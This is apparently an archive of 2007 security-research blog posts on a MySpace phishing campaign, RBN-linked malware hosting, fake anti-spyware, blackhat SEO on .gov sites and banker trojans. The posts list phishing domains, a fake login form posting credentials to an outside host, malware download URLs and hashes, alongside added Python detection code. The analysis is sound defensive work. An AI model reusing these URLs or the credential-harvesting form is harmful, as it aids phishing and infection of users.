Large Scale MySpace Phishing Attack

November 20, 2007
In need of a "creative phishing campaign of the year"? Try this one: perhaps the largest phishing attack spoofing MySpace and collecting all the login details at a central location, which has been active for over a month and continues to be. A Chinese phishing group has come up with legitimate-looking MySpace profile hostnames (profile.myspace.com) in the form of subdomains at their own .cn domains, and by doing so achieves its ultimate objective: establish trust through typosquatting, remain beneath the security vendors' radar by comment-spamming the URLs inside MySpace, and obtain the login details of everyone who gets tricked.

Key points :

- all of the participating domains use identical DNS servers, and their DNS records are set to change every 3 minutes

- each domain uses a different comment spam message, making it easy to assess the potential impact of each of them

- the URLs are not spammed the way typical phishing emails are, but comment-spammed within MySpace using legitimate accounts, presumably ones that have already fallen victim to the campaign, mostly to remain beneath the radar of security vendors, who would have picked the URLs up had they been spammed in the usual manner

- all of the URLs and subdomains are currently active, and the login details get forwarded to a central location, 319303.cn/login.php

This is how the fake MySpace login form looks on the fake domains/subdomains :
(form action = "http://319303.cn/login.php" method = "post" name = "theForm" id = "theForm")

This is how the real MySpace login form looks :
(form action = "http://secure.myspace.com/index.cfm?fuseaction=login.process" method = "post" id = "LoginForm")

Sample MySpace phishing URLs from this campaign :

profile.myspace.com.fuseaction.id.0ed37i8xdd.378d38.cn
profile.myspace.com.index.fuseaction.id.370913.cn
profile.myspace.com.fuseaction.id.0ed37i8xdd.125723.cn
profile.myspace.com.fuseaction.id.Dx78x00iJe5.982728.cn
profile.myspace.com.fuseaction.user.id.28902334.arutncbt.cn
profile.myspace.com.fuseaction.id.0nd8di8xfd.125723.cn
profile.myspace.com.fuseaction.id.0ed37i8xdd.109820.cn
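A defender-side check for the two things shown above, a brand name embedded as a subdomain label under someone else's registrable domain and a login form whose action posts credentials to a foreign host, as an added example that is not part of the original post. The form tags and hostnames are the ones quoted above; the two-label registrable-domain simplification, the function names and the classification strings are my own assumptions.

```python
import re
from urllib.parse import urlparse

# Expected brand domain for the login page being inspected.
EXPECTED_BRAND = "myspace.com"

# The two form tags quoted in the post (fake first, genuine second).
FAKE_FORM = ('<form action="http://319303.cn/login.php" method="post" '
             'name="theForm" id="theForm">')
REAL_FORM = ('<form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" '
             'method="post" id="LoginForm">')

# Sample hostnames from the post plus two genuine MySpace hosts for comparison.
SAMPLE_HOSTS = [
    "profile.myspace.com.fuseaction.id.0ed37i8xdd.378d38.cn",
    "profile.myspace.com.fuseaction.user.id.28902334.arutncbt.cn",
    "profile.myspace.com",
    "secure.myspace.com",
]


def registrable_domain(host):
    """Return the last two labels of a hostname (e.g. '378d38.cn').

    Simplification (assumption): production code should consult the Public Suffix
    List so that multi-label suffixes such as co.uk are handled; two labels are
    enough for the .cn and .com names discussed here.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def is_lookalike(host, brand=EXPECTED_BRAND):
    """True when the brand name appears inside the hostname but the name is actually
    registered under some other domain, as in profile.myspace.com.<id>.378d38.cn."""
    h = host.lower()
    return brand in h and registrable_domain(h) != brand


def form_action_host(form_tag):
    """Extract the hostname from a form's action attribute, or None if it has none
    (a relative action stays on the page's own origin)."""
    m = re.search(r'action\s*=\s*"([^"]*)"', form_tag, re.IGNORECASE)
    return urlparse(m.group(1)).hostname if m else None


def check_login_form(form_tag, brand=EXPECTED_BRAND):
    """Classify where a login form sends credentials: 'ok' if the action stays under
    the brand's registrable domain, otherwise name the foreign domain receiving them."""
    host = form_action_host(form_tag)
    if host is None:
        return "no-action"  # relative or missing action: inspect the page origin manually
    target = registrable_domain(host)
    return "ok" if target == brand else f"credentials posted to {target}"


if __name__ == "__main__":
    for h in SAMPLE_HOSTS:
        verdict = "LOOKALIKE" if is_lookalike(h) else "genuine"
        print(f"{h}: {verdict} (registered under {registrable_domain(h)})")
    print("fake form:", check_login_form(FAKE_FORM))
    print("real form:", check_login_form(REAL_FORM))
```

The hostname check catches the typosquatting trick on its own, while the form check catches the case where a page on a plausible host still posts to a collector elsewhere; the post shows both signals present at once.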

Ten sample Chinese domains participating in the phishing attack, returning the MySpace spoof both at the main index and on the subdomains :

378d38.cn
978bg33.cn
370913.cn
107882.cn
103238.cn
978nd03.cn
107882.cn
pcc2ekxz.cn
125723.cn
pckeez.cn

Assessing the comment messages used on ten phishing domains for internal comment spamming at MySpace :

370913.cn - "haha i cant believe we went to high school with this girl"
978bg33.cn - "sometimes i cannot believe the pics people put on their myspaces"
982728.cn - "I cannot believe this freaking whore would put pics like that on her myspace page.. how trashy.."
977y62.cn - "did you see what happened? OMG you gotta see Mike's profile."
125723.cn - "did you see what happened? OMG you gotta see Mike's profile."
pckeez.cn - "can you believe we went to highschool with this chick?"
pcc2ekxz.cn - "can't believe a 18 year old chick would put half-nude pics on myspace. whore alert."
arutncbt.cn - "wow her brother is gonna be so pissed when he sees the pictures she put on her myspace"
125723.cn - "Did you hear what happened Omg you gotta see the profile.. So sad!"
109820.cn - "sometimes i just cannot believe the pics that people put on their myspaces LMAO!"

The campaign is surprisingly well thought out. If they were spamming the phishing URLs by email, security vendors would have picked it up immediately and its lifetime would have been much shorter than its current one. The phishers aren't sending emails asking people to log in to MySpace via profile.myspace.com.random_digits.cn, for instance; instead they're spamming inside MySpace by posting comments prompting users to click further, using phrases such as "haha i cant believe we went to high school with this girl". It gets even more interesting: compared to the common logic of registering fake accounts and posting the comments from them, in this case the three sample comments posted on Nov 2 2007 11:22 AM; Nov 4 2007 1:02 PM; Nov 5 2007 8:47 AM; Nov 5 2007 9:33 PM are all posted by legitimate users, or rather from legitimate users' accounts. How huge is this? Over 378,000 results for the campaign under this phrase, keeping in mind that people embed their MySpace profiles at their own domains, and 128,000 instances of a sample phishing domain (370913.cn) at MySpace.com itself. And this is for one of the phishing domains only.

Now if that's not enough to disturb you, each and every one of the .cn domains resolves to what look like U.S.-based hosts only, which change every 3 minutes. Not necessarily as dynamic as the previously discussed fast-flux networks, but these are worth keeping an eye on :

107882.cn
978bg33.cn

Here are some central DNS servers that all the .cn domains use :

ns4.6309a46.com
ns1.52352a0c60a9c29.com
ns3.926817a885d86e1.com
ns2.terimadisirida.net
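Two of the infrastructure traits above, A records that rotate every few minutes and a set of domains sharing the same name servers, can be pulled out of a passive-DNS or resolver log mechanically. The following is an added example, not part of the original post: the log lines are constructed (the timestamps, TTLs and RFC 5737 documentation addresses are made up, since the post gives no addresses), only the domain and name server names come from the post, and the thresholds in flux_summary are assumptions.

```python
from collections import defaultdict
from datetime import datetime

# Constructed resolution log: "<timestamp> <domain> <type> <value> <ttl>".
# Addresses are RFC 5737 documentation ranges, not real observations.
LOG = """\
2007-11-20T10:00:00 107882.cn A 192.0.2.10 180
2007-11-20T10:03:00 107882.cn A 192.0.2.55 180
2007-11-20T10:06:00 107882.cn A 198.51.100.7 180
2007-11-20T10:09:00 107882.cn A 192.0.2.10 180
2007-11-20T10:00:00 978bg33.cn A 198.51.100.21 180
2007-11-20T10:03:00 978bg33.cn A 192.0.2.99 180
2007-11-20T10:06:00 978bg33.cn A 198.51.100.40 180
2007-11-20T10:00:00 example.com A 203.0.113.5 86400
2007-11-20T10:03:00 example.com A 203.0.113.5 86400
2007-11-20T10:00:00 107882.cn NS ns4.6309a46.com 180
2007-11-20T10:00:00 978bg33.cn NS ns4.6309a46.com 180
2007-11-20T10:00:00 example.com NS ns1.example.net 86400
"""


def parse_log(text):
    """Parse log lines into (timestamp, domain, rtype, value, ttl) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, domain, rtype, value, ttl = line.split()
        records.append((datetime.fromisoformat(ts), domain.lower(), rtype, value, int(ttl)))
    return records


def flux_summary(records, max_ttl=300, min_distinct_ips=3):
    """Per domain: how many distinct A records were seen, the lowest TTL, the
    observation span in minutes, and a flux_like flag. Thresholds are assumptions:
    three or more addresses within a short window at a TTL of five minutes or less
    is the pattern the post describes (records changing every 3 minutes)."""
    ips, ttls, times = defaultdict(set), defaultdict(list), defaultdict(list)
    for ts, domain, rtype, value, ttl in records:
        if rtype == "A":
            ips[domain].add(value)
            ttls[domain].append(ttl)
            times[domain].append(ts)
    summary = {}
    for domain in ips:
        span = (max(times[domain]) - min(times[domain])).total_seconds() / 60
        summary[domain] = {
            "distinct_ips": len(ips[domain]),
            "min_ttl": min(ttls[domain]),
            "span_minutes": span,
            "flux_like": len(ips[domain]) >= min_distinct_ips and min(ttls[domain]) <= max_ttl,
        }
    return summary


def domains_by_nameserver(records):
    """Group domains by the NS names they use, so that a cluster of otherwise
    unrelated domains behind one name server stands out."""
    groups = defaultdict(set)
    for _, domain, rtype, value, _ in records:
        if rtype == "NS":
            groups[value.lower()].add(domain)
    return {ns: sorted(domains) for ns, domains in groups.items()}


if __name__ == "__main__":
    recs = parse_log(LOG)
    for domain, info in flux_summary(recs).items():
        print(domain, info)
    for ns, domains in domains_by_nameserver(recs).items():
        print(ns, "->", ", ".join(domains))
```

A single low TTL is common for legitimate CDN-hosted names, so the example requires both the low TTL and a churn of distinct addresses before flagging a domain; grouping by name server then turns individually suspicious domains into a campaign-level list.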

I'll leave the data mining based on these patterns to you. What's important is that the URLs are still serving spoofed MySpace front pages, with the only downside that they cannot successfully load MySpace's videos and don't provide any SSL authentication, which I doubt has prevented many people from falling victim to it.

Does all the data lead us to conclude that this could be the most "creative phishing campaign of the year"? Let's have it offline first.

The "New Media" Malware Gang

November 18, 2007
Since Possibility Media's malware fiasco, I've been successfully tracking the group behind the malware-embedded attack at each and every online publication of Possibility Media. Successfully, mostly because of their lack of interest in putting any effort into making themselves harder to trace back, namely maintaining a static web presence, but one with a diversifying set of malware and exploits in use. Possibility Media's main IFRAME used was 208.72.168.176/e-Sr1pt2210/index.php, and at 208.72.168.176 we have a great deal of parked domains in standby mode, such as :

repairhddtech.com
granddslp.net
prevedltd.net
stepling.net
softoneveryday.com
samsntafox.com
himpax.com

grimpex.org
trakror.org
dpsmob.com
besotrix.net
gotizon.net
besttanya.com
carsent.com
heliosab.info
gipperlox.info
leader-invest.net
fiderfox.info
potec.net

However, the latest IPs and domains related to the group are dispersed across different netblocks and are actively serving malware through exploit URLs :

78.109.16.242/us3/index.php
x-victory.ru/forum/index.php (85.255.114.170)
asechka.cn/traff/out.php (78.109.18.154)
trafika.info/stools/index.php (203.223.159.92)

What's so special about this group? It's the connection with the Russian Business Network. As I've already pointed out, the malware attack behind Possibility Media's was using IPs rented on behalf of RBN customers from their old netblock; here are two such examples of RBN IPs used by this group as well :

81.95.149.236/us3/index.php
81.95.148.162/e202/

In case you also remember, some of this group's URLs were also used as a communication vehicle for a downloader hosted on an RBN IP, the very same RBN IP that was behind Bank of India's main IFRAME. Now that's a mutually beneficial malicious ecosystem for both sides. Here are more comments on other ecosystems.

But of Course I'm Infected With Spyware

November 18, 2007
Remember those old-school fake hard drive erasers, where a status bar that's basically doing a directory listing is shown, and HDD activity is simulated so that the end user gets the false feeling of witnessing the process? Fake anti-spyware and anti-virus software, like the ones courtesy of the now fast-moving RBN, have been using this tactic for a while, adding an additional layer of social engineering tricks by obtaining the PC's details with simple JavaScript. The folks behind online-scan.com; spyware.online-scan.com; antivirus.online-scan.com own a far more deceptive domain name compared to RBN's ones. In fact, even an anti-virus vendor could envy them for not picking it up earlier and integrating it into an upcoming marketing campaign or service. SpywareSoftStop's statements :

"At present the Internet is stuffed with viruses of any kind. Every PC is at risk and most probably IS infected. Anti-viruses can detect viruses only, but spyware, installed surreptitiously on a PC without the user's informed consent, is modified each day and solely particularized software can help to detect and remove it. However, a spyware program is rarely alone on a computer: an affected machine can rapidly be infected by many other components. In some infections, the spyware is not even evident; moreover, some types of spyware disable software firewalls and anti-virus software, and/or reduce browser security settings, thus opening the system to further opportunistic infections, much like an immune deficiency disease. Right now your system is going to be scanned and spyware, if any, will be detected."

The name servers preved.spywaresoftstop-support.com and medved.spywaresoftstop-support.com serve spywaresoftstop.com; spywaresoftstop-cash.com; spywaresoftstop-support.com. The popup at online-scan.com, which is now returning a 404 error for ldr.exe (downloadfilesldr.com/download/2/ldr.exe), will even appear if you try to close the window while your PC is "being scanned". What's ldr.exe? It's the default output of DIY malware courtesy of Pinch.

Lonely Polina's Secret

November 16, 2007
Just as I've been monitoring lots of spam that's using Geocities redirectors, yesterday Nicholas posted some details on a malware campaign using Geocities pages as redirectors, and Roderick Ordonez acknowledged the same. Original Geocities URLs used : geocities.com/MediciChavez7861 (active) ; geocities.com/IliseNkrumah2 (down) ; geocities.com/GounodNanon5 (down). Original message of the spam campaign (German, translated) :

"Hello! My name is Polina. I am a student and I have come to Germany to study. I am looking for a friend and a sex partner. All I want is a good man. You should be serious, reliable, smart. Let me know if you want to meet me. You can also simply be my friend. You can see my photos on my page: geocities.com/MediciChavez7861 PLEASE, ONLY SERIOUS proposals. KISSES, POLINA"

The fake lonely German student Polina was also accessible from other URLs as well: ThePagesBargain.ru/polina and dibopservice.com, both now down, as well as the main 58.65.238.36/polina URL, which is forwarding to baby.com in an attempt to cover up the campaign -- you wish. Internal pages within the IP are still accessible: 58.65.238.36/index2_files/index3.htm; 58.65.238.36/index2_files/index.htm, and so is the malware itself: 58.65.238.36/iPIX-install.exe.

Malware campaigners are not just setting objectives and achieving them; they're also evaluating the results and drawing conclusions on how to improve the next campaign. Back in January 2006, I emphasized the emerging trend of localization in respect to malware, take for instance the release of a trojan in open source form so that hacking groups from different countries could localize it by translating it into their native language and making it even easier to use, as well as the localization of the MPack and IcePack malware kits into Chinese. In this campaign, a localized URL targeting Dutch-speaking visitors was also available, 58.65.238.36/polinanl, so you have both German and Dutch included, and as we've seen, the ongoing consolidation of malware authors and spammers serves both sides well: the spammers segment all the German and Dutch emails on one hand, and the malware authors mass-mail using localized message templates. Great social engineering, abusing a common stereotype: German users, for instance, were definitely flooded with English messages courtesy of the Storm Worm targeting U.S. citizens, which is like a Chinese user receiving a phishing email from the Royal Bank of Scotland - both are obviously easy to detect. That is what localization is all about: the malware and the spam speak your local language. One downside of this campaign is that Polina doesn't really look like a lonely German student; in fact she's a model, and these are some of her portfolio shots.

Let's discuss how the malware campaigners are coming up with these Geocities accounts in the first place. Are the people behind the campaign manually registering them, outsourcing the registration process to someone else, or directly breaking the CAPTCHA? It could be even worse: they may be buying already registered Geocities accounts from another group that specializes in registering them, a group which, like the previously covered concept of Proprietary Malware Tools, earns revenues on higher profit margins given that they don't distribute the product but provide the service, thereby keeping the know-how of the automatic registration process to themselves. Once the authentication details are known, anything from blackhat SEO, direct spamming and malware hosting to embedding such scripts, even IFRAMEs, can follow in a fully automated fashion.

Meanwhile, what are the chances there's another scammy ecosystem on the same netblock? But of course: vaichoau.com fake watches, pimpmovie.net malware C&C, urolicali.com.cn spammers, westernunion.reg-login.com a phishing URL.

First Person Shooter Anti-Malware Game

November 15, 2007
Just when you think you've seen everything "evil marketers" can come up with to both consciously and subconsciously influence your purchasing behaviour and improve the favorability scale towards a company - you can still get surprised. After a decent example of the DIY marketing concept, Microsoft's perception of security as a "threat from outer space", an example of rebranding a security vendor, and the Invisible Burglar game, here comes another good example of new media marketing practice: while some companies seek to embed their logos into popular games, others are coming up with games of their own. Symantec's Endpoint Protection Game, a first person shooter where the typical mutated creatures are replaced with viruses, spyware and rootkits, is what I'm blogging about :

"Your task is to simply save your global network from viruses, worms, and a hideous host of online threats that are poised to take your IT infrastructure down."

Eye-catching trailer as well. Such marketing campaigns can have huge educational potential if they're customized, for instance, for a specific security awareness program module.

Cyber Jihadist Blogs Switching Locations Again

November 15, 2007
Having had their blogs removed from WordPress in a coordinated shutdown operation courtesy of the wisdom of the anti-cyber-jihadist crowd, The Ignored Puzzle Pieces of Knowledge and The Caravan of Martyrs have switched location to these URLs: inshallahshaheed.muslimpad.com; inshallahshaheed.acbox.com; caravanofmartyrs.muslimpad.com; ignoredknowledge.blogspot.com. Apparently there's an ongoing migration of cyber jihadist blogs from WordPress to Muslimpad, presumably with the idea of increasing the time from a TOS abuse letter to a shutdown, if a shutdown ever occurs, given that Muslimpad is hardly unbiased when it comes to removing such communities, positioned as "free speech" ones, its hosting provider being islamicnetwork.com. Should such propaganda be tolerated? This is where the different mandates of anti-cyber-jihadist organizations across the world contradict each other. Some have a mandate to shut down such blogs and sites as soon as they come across them, others have a mandate to monitor and analyze them to keep pace with emerging threats in the form of real-time intelligence, and in the near future other participants will have a mandate to infect such communities with malware, ultimately targeting the cyber jihadists behind them or the visitors themselves.

The bottom line: the propaganda in the form of a step-by-step video of an attack in question is a direct violation of their operational security (OPSEC), thereby providing the world's intelligence community with raw data on their warfare tactics. The propaganda's trade-off is similar to that of the Dark Cyber Jihadist Web: while you may want to reach as many future recruits and "converts" as possible, you increase the chance of an intelligence analyst coming across your community, compared to closing it down to sorted and trustworthy individuals and therefore limiting the number of potential future jihadists. Inshallahshaheed are, however, going for mass marketing at full speed, and in fact maintain a modest repository of videos at inshallahshaheed.vodpod.com. By the way, what's the difference between wishful thinking and thought crime? It's a threat that proves there's a positive ROI on your actions.

Related posts :
GIMF Switching Blogs
GIMF Now Permanently Shut Down
GIMF - "We Will Remain"

Popular Spammers Strategies and Tactics

November 14, 2007
It's been a while since I last contributed an article to WindowSecurity.com, so here it goes - Popular Spammers Strategies and Tactics :

"During 2007, spammers on a worldwide basis demonstrated their adaptability to the ongoing efforts anti-spam vendors put into ensuring their customers enjoy the benefits of having a spam-free inbox. What strategies do spammers use in order to achieve this? What tactics do they use in order to obtain email addresses, verify their validity, ensure they reach the highest number of recipients possible in the shortest time span achievable, while making sure their spam campaigns remain virtually impossible to shut down?"

The article covers strategies and tactics such as: redirectors/doorway pages; rapid tactical warfare; verification/confirmation of delivery; consolidation; outsourcing; and affiliation-based models.

Electronic Jihad's Targets List

November 14, 2007
Despite the fact that the Electronic Jihad 3.0 campaign was a futile attempt right from the very beginning, given that the domains that were supposed to synchronize the targets to be attacked were down, it's interesting to try to find out who they were targeting in the first place. In the first campaigns, the URLs of the targets (not victims, since they couldn't scale enough to cause even partial damage) were obtainable via the web, compared to the third one, where they were about to get synchronized. And since the synchronization URLs were down before we could take a peek, here are the target URLs from the first two campaigns.

First campaign's targets list :
gov.il
keshmesh.net
meca-love4all.com
love4all.us

Second campaign's targets list :
love4all.us
islameyat.com
aldalil-walborhan.com
rapsaweyat.com
investigateislam.com
meca-me.org
ladeeni.net
meca-love4all.com

The attached table is the classification of the attacks: site to be attacked, reason for the attack, importance, the results, and the site's status after the attack, namely whether it is up and running or shut down completely, and how shutting it down would please God.

There's a saying that a person is judged by the type of enemies he has. If we apply it to this situation, you would see a bunch of inspired wannabe cyber jihadists whose biggest enemy is their own idiocy in the first place. So, if these are the cyber jihadist enemies of yours - lucky you, and your critical infrastructure's integrity.

Scammy Ecosystem

November 14, 2007
In this example of a scammy ecosystem, you have a single IP (88.255.90.50) hosting the now retro WebAttacker exploitation kit (inn2coming.com/income/index.php), a viagra scam (pctabletshop.hk) on the second parked domain, and investment banking scams on another two: progold-inv.biz; cfinancialservice.com. Now, all they're missing is a Rock Phish kit hosted on it, and it would have made an even more interesting operation to monitor. Of course, putting more personal effort into everything pays off. The same netblock is also hosting such popular downloader update locations and live exploit URLs as stat1count.net; all1count.net; and the recently appeared on the radar mediacount.net (88.255.90.253).

Teaching Cyber Jihadists How to Hack

November 12, 2007
Yet another indication of the emerging trend of building a knowledge-driven cyber jihadist community are such online archives of standard security and hacking research papers localized into Arabic, ones you definitely came across before, or may in fact have written yourself. As I've already discussed this trend in previous posts, it's a PSYOPS strategy in action, one that's aiming to improve the overall perception of cyber jihadists' ability to wage their battles without using the software and web services of their enemies. Whether the investment in time and resources is worth it is another topic; what's worth pointing out are the efforts they put into localizing the content, in between adding the standard propaganda layer, and later on building a community around it.

p0rn.gov - The Ongoing Blackhat SEO Operation

November 12, 2007
Want pr0n? Try .gov domains in general, ones that have been getting the attention of blackhat SEOers for a while, just like the most recent related cases where the City of Chetek, Wisconsin, the City of Somerset, Texas and the Town of Norwood, Massachusetts got their blackhat SEO injection. The previous attack is related to the one I'll assess in this post; the blackhat SEO tool is the same, given the static subdomains generated. What remains to be answered is how they've managed to get access to the control panels of the domains in order to add the subdomains. Let's look at the facts :

- the targets in this attack are the Virgin Islands Housing Finance Authority (VIHFA) and the City of Selma, Alabama

- this is the second blackhat SEO operation uncovered during the past couple of months targeting .gov domains

- access to the control panels is somehow obtained, so that subdomains pointing to 89.28.13.207 (89-28-13-207.starnet.md) and 89.28.13.195 (89-28-13-195.starnet.md) are added at both domains

- both .gov domains targeted in this attack use a shared hosting provider, meaning their IP reputation is in the hands of everyone else's web activities responding under the same IP

- no malware is served in this incident, compared to the previous one, which was a combination of malware and blackhat SEO

Subdomains at City of Selma currently hosting around 9000 blackhat SEO pages :

m21.selma-al.gov
m22.selma-al.gov
m23.selma-al.gov
m24.selma-al.gov
m25.selma-al.gov
m26.selma-al.gov
m27.selma-al.gov
m28.selma-al.gov
m29.selma-al.gov
m30.selma-al.gov
m31.selma-al.gov
m32.selma-al.gov
m33.selma-al.gov
m34.selma-al.gov

Subdomains at the Virgin Islands Housing Finance Authority with constantly changing structure :

a1.a.vihfa.gov
a2.a.vihfa.gov
a3.a.vihfa.gov
a4.a.vihfa.gov
a5.a.vihfa.gov
a6.a.vihfa.gov
a7.a.vihfa.gov
a8.a.vihfa.gov
a9.a.vihfa.gov
a10.a.vihfa.gov

Related subdomains now no longer responding :

2k110.x.vihfa.gov
2k106.x.vihfa.gov
j11.y.vihfa.gov
j9.y.vihfa.gov
z1.z.vihfa.gov
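A zone owner can catch this kind of injected subdomain by reviewing its own zone for two signals at once: A records pointing outside the organization's known address space, and leftmost labels of the short letter-plus-number shape the tool generates (m21, a7, j11, z1). This is an added example, not code from the original post. The hostnames and the two starnet.md addresses are the ones listed above; the zone listing as a whole, the 203.0.113.0/24 "legitimate range" (an RFC 5737 documentation prefix, since the post does not give the city's real range) and the label pattern are constructed assumptions.

```python
import ipaddress
import re

# Assumed legitimate hosting range for the zone (constructed; RFC 5737 documentation prefix).
ORG_PREFIXES = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed zone listing: "<name> <type> <value>". The m2x hostnames and the two
# 89.28.13.x addresses come from the post; www/mail and their addresses are made up.
ZONE_LISTING = """\
www.selma-al.gov A 203.0.113.10
mail.selma-al.gov A 203.0.113.11
m21.selma-al.gov A 89.28.13.207
m22.selma-al.gov A 89.28.13.207
m23.selma-al.gov A 89.28.13.195
"""

# Leftmost label of one or two letters followed by up to three digits (assumed
# generalization of the m21 / a7 / j11 / z1 labels listed in the post).
GENERATED_LABEL = re.compile(r"^[a-z]{1,2}\d{1,3}$")


def parse_zone(text):
    """Return (hostname, ip_address) pairs for the A records in a zone listing."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        name, rtype, value = line.split()
        if rtype.upper() == "A":
            records.append((name.lower().rstrip("."), ipaddress.ip_address(value)))
    return records


def outside_org(records, prefixes=ORG_PREFIXES):
    """A records whose address is in none of the organization's prefixes."""
    return [(name, str(ip)) for name, ip in records
            if not any(ip in prefix for prefix in prefixes)]


def generated_looking(records):
    """Hostnames whose leftmost label matches the generated-label pattern."""
    return [name for name, _ in records
            if GENERATED_LABEL.match(name.split(".")[0])]


def review(records, prefixes=ORG_PREFIXES):
    """Hostnames that trip both signals: tool-like label AND foreign address.
    Requiring both keeps a legitimately outsourced host (foreign address, normal
    name) and an internal host with a terse name from being flagged."""
    foreign = {name for name, _ in outside_org(records, prefixes)}
    generated = set(generated_looking(records))
    return sorted(foreign & generated)


if __name__ == "__main__":
    zone = parse_zone(ZONE_LISTING)
    print("outside org range:", outside_org(zone))
    print("generated-looking:", generated_looking(zone))
    print("flag for removal :", review(zone))
```

Run against a real zone export, the same two functions give an operator a short list to compare against change tickets; a record that is in neither list is the boring, expected case.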

Where's the connection between this blackhat SEO operation and the previous one? It's not just that the subdomains at the different .gov's are responding from IPs on the same netblock, but also that 89.28.13.202 is responding to City of Somerset's subdomains from the previous incident, such as : j6.y.somersettx.gov; st9.x.somersettx.gov; x.somersettx.gov.

Looks like someone in Moldova will get spanked for these incidents.

Targeted Spamming of Bankers Malware

November 12, 2007
This particular incident is interesting mostly because it's a good example of how, once a site gets compromised, the potential for abusing that access for malware distribution becomes very real. This is in fact what happened with autobroker.com.pl, as the following URLs were active as of yesterday and are now down after notification. Basically, the compromised host, compromised in an automated and efficient way for sure, started acting as the foundation for the campaign, which as it looks was spammed in a targeted manner. A tiny PHP file at autobroker.com.pl/l.php was launching the downloader :

TROJ.BANLOAD
Result: 18/31 (58.07%)
File size: 46080 bytes
MD5: 690e71077c9d78347368c6cf8752741e
SHA1: 7dedad0778a24c69d6df4c8ceedc94f20292473e

The downloader then drops the following bankers, which are strangely hosted on the French site Opus Citatum and are still active :

opuscitatum.com/modules/PHP%20Files/__steampw12318897_.exe

Trojan-Spy.Win32.Banker.ciy
Result: 9/32 (28.13%)
File size: 2498560 bytes
MD5: cee1fdea650487e0865a1b8831db1e73
SHA1: ad55ff3e5519d88b930d6a0a695e71fcc253351e

opuscitatum.com/modules/PHP%20Files/Ivete_Sangalo.scr

Trojan.PWS.Banker
Result: 13/32 (40.63%)
File size: 2505216 bytes
MD5: 1bdb0d3e13b93c76e50b93db1adeed3e
SHA1: f472693da81202f4322425b952ec02cbff8d72bc

The campaign was originally spammed with the messages "Chegou 1 vivo foto torpedo" and "Vivo torpedo foi enviado de um celular para seu e", using the web-based spammer you can see in the attached screenshot.

More info about banking malware, comments on a recently advertised MetaPhisher malware kit with banker-trojan-infected hosts only, showcasing the malicious-economies-of-scale botnet master mentality, as well as related posts on targeted malware attacks.

Yet Another Malware Outbreak Monitor

November 09, 2007
Such early warning security event systems always come in handy as research tools for security analysts and reporters, and it's great to see that more and more vendors are continuing to share interactive threat data in real time, the type of data that used to be proprietary several years ago. Commtouch's recently announced Malware Outbreak Center is another step in the right direction of intelligence data sharing, and of building more transparency on emerging spam and malware outbreaks :

"The Commtouch Malware Outbreak Center displays a sample of email-borne malware that has recently been detected and blocked by Commtouch's Zero-Hour(TM) Virus Outbreak Protection solution. It also incorporates data from AV-Test.org, an independent third-party organization that tests most of the commercially available anti-virus scanners. This data enables the Center to publish comparative detection times for leading AV vendors, a first in this comprehensive format which includes malware variant checksum. Detection times are critical, since individual virus variants often peak and then nearly disappear, all in under three hours. IT managers now have access to an online tool that allows them to verify their AV vendor's performance for each new outbreak, and to download comparative data per malware variant."

Zero-day DIY malware and open source malware undermine the reactive response model, but without anti-virus signatures in 2007 your company and customers would still be getting infected by outdated Netsky samples - it's a fact, yet not the panacea for dealing with malware, and it has never been. Another important issue that deserves to be discussed is the virus outbreak response time of different vendors in Stormy Wormy times, for instance. In the past, vendors were even using their in-the-wild detection, and on-the-fly binary obfuscation in times of open source malware results in a countless number of variants. Good PR is vital, and so is gaining competitive advantage in the minds of prospective customers by positioning the company among the first to have responded to the outbreak, but it raises the issue of the degree to which malware samples are exchanged between the vendors themselves, and the lack of transparency here. Just as initiatives in the form of honeyfarms contributing hundreds of malware samples, and "wisdom of crowds" end users filling the gaps in reactive response, indirectly protect millions of customers on behalf of anti-virus software, exchanging malware samples in the shortest possible time frame ultimately benefits each and every customer and organization that has an anti-virus in its perimeter defense strategy.

A non-profit honeyfarm can collect hundreds of thousands of undetected malware samples in a single month; let's speculate that it could even outperform a small AV vendor's malware aggregation capabilities. In the anti-virus industry, branding is crucial, and therefore the non-profit honeyfarm cannot enter the market; instead, its only incentive to donate the samples to the anti-virus vendors is that of social responsibility. AVs should build more awareness of the importance of malware sample sharing among themselves, compared to pitching themselves as the vendor who first picked up the outbreak and protected its customers. Bargaining with someone's upcoming infection isn't that much of a success if you think about it. The "Hey, that signature is mine" days should have been over by now.

Moreover, it's a basic principle of every competitive market that the more competition, the more choices the customer has, thereby making vendors innovate or cease to exist in irrelevance. Does the same apply to the anti-virus market? Can we have a built-to-flip honeyfarm turned anti-virus vendor, later acquired and integrated within a company's existing product portfolio? Let's hope not, and it's doubtful, as there's a difference between anti-virus software and "anti-virus software", at least from the perspective that the second "anti-virus software" may be occupying markets that could otherwise have been served by a better market proposition. Product development of an AV courtesy of a security vendor's product portfolio, given the vendor realized that a huge percentage of security spending goes to perimeter defense solutions, can be tricky, and even if an acquisition has taken place, you'd better stick to a company whose core competency is anti-virus solutions.

Still Living in the Perimeter Defense World?

Go to Sleep, Go to Sleep my Little RBN

November 08, 2007
Yesterday, Paul Ferguson tipped me off on the sudden disappearance of the Russian Business Network. And just as babies have a different understanding of day and night, the RBN isn't interested in going to sleep either; in fact there's speculation that they're relocating their infrastructure to China, speculation in the sense that it could be another such localized RBN operation :

"Jamz Yaneza, a Trend Micro research project manager, agreed. "We're seeing signs of RBN-like activity elsewhere, in Turkey, Taiwan and China. RBN may be moving to places even more inaccessible to the law [than Russia]. Everyone knows they were in St. Petersburg, but now they're changing houses, changing addresses. The Spamhaus Project antispam group has posted information that indicates RBN may have already laid claim to IP blocks located in China, Shanghai in particular."

It's always a pleasure to monitor the RBN; a single activity on behalf of their customers represents an entire sample to draw conclusions from. Catch up with activities such as over 100 Malwares Hosted on a Single RBN IP, Fake Anti Virus and Anti Spyware Software, and the most recent Fake Suspended Account Messages while the IPs are alive and serving exploits and malware. Well, used to.

UPDATE: RBN - Russian Business Network, Chinese Web Space and Misdirection

Electronic Jihad v3.0 - What Cyber Jihad Isn't

November 07, 2007
